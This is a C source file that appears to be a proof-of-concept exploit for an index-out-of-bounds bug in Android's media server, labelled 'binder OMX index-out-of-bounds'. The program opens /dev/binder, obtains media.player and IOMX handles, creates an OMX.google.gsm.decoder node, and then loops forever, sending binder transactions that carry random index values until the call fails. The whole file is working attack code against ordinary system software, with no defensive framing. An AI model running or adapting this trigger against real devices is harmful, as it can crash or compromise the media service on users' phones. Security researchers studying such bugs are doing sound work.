#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#include <unistd.h>

#include "binder.h"

int main(int argc, char** argv) {
  struct binder_state* bs;
  struct binder_io msg;
  struct binder_io reply;
  char data[1024];
  uint32_t player_handle = 0;
  uint32_t iomx_handle = 0;
  uint32_t result = 0;
  uint32_t node_id = 0;

  fprintf(stderr, "--- binder OMX index-out-of-bounds ---\n");

  fprintf(stderr, "[0] opening /dev/binder\n");
  bs = binder_open(0x400000);

  fprintf(stderr, "[0] looking up media.player\n");
  bio_init(&msg, data, sizeof(data), 4);
  bio_put_uint32(&msg, 0x100);
  bio_put_string16_x(&msg, "android.os.IServiceManager");
  bio_put_string16_x(&msg, "media.player");
  binder_call(bs, &msg, &reply, 0, 1);
  player_handle = bio_get_ref(&reply);
  fprintf(stderr, "[0] got handle %08x\n", player_handle);
  binder_acquire(bs, player_handle);
  binder_done(bs, &msg, &reply);

  fprintf(stderr, "[0] creating an OMX\n");
  bio_init(&msg, data, sizeof(data), 4);
  bio_put_uint32(&msg, 0x100);
  bio_put_string16_x(&msg, "android.media.IMediaPlayerService");
  binder_call(bs, &msg, &reply, player_handle, 4);
  iomx_handle = bio_get_ref(&reply);
  fprintf(stderr, "[0] got handle %08x\n", iomx_handle);
  binder_acquire(bs, iomx_handle);
  binder_done(bs, &msg, &reply);

  fprintf(stderr, "[0] creating node\n");
  bio_init(&msg, data, sizeof(data), 4);
  bio_put_uint32(&msg, 0x100);
  bio_put_string16_x(&msg, "android.hardware.IOMX");
  bio_put_cstring(&msg, "OMX.google.gsm.decoder");
  bio_put_obj(&msg, (void*)0x41414141);
  binder_call(bs, &msg, &reply, iomx_handle, 4);
  result = bio_get_uint32(&reply);
  if (!result) {
    node_id = bio_get_uint32(&reply);
    fprintf(stderr, "[0] got node %08x\n", node_id);
  }
  binder_done(bs, &msg, &reply);

  srand(time(NULL));
  while (1) {
    fprintf(stderr, "[0] triggering bug\n");
    bio_init(&msg, data, sizeof(data), 4);
    bio_put_uint32(&msg, 0x100);
    bio_put_string16_x(&msg, "android.hardware.IOMX");
    bio_put_uint32(&msg, node_id);
    bio_put_uint32(&msg, rand());
    bio_put_uint32(&msg, 0);
    bio_put_uint32(&msg, 0);
    if (0 > binder_call(bs, &msg, &reply, iomx_handle, 12)) {
      break;
    }
    binder_done(bs, &msg, &reply);
  }

  return 0;
} 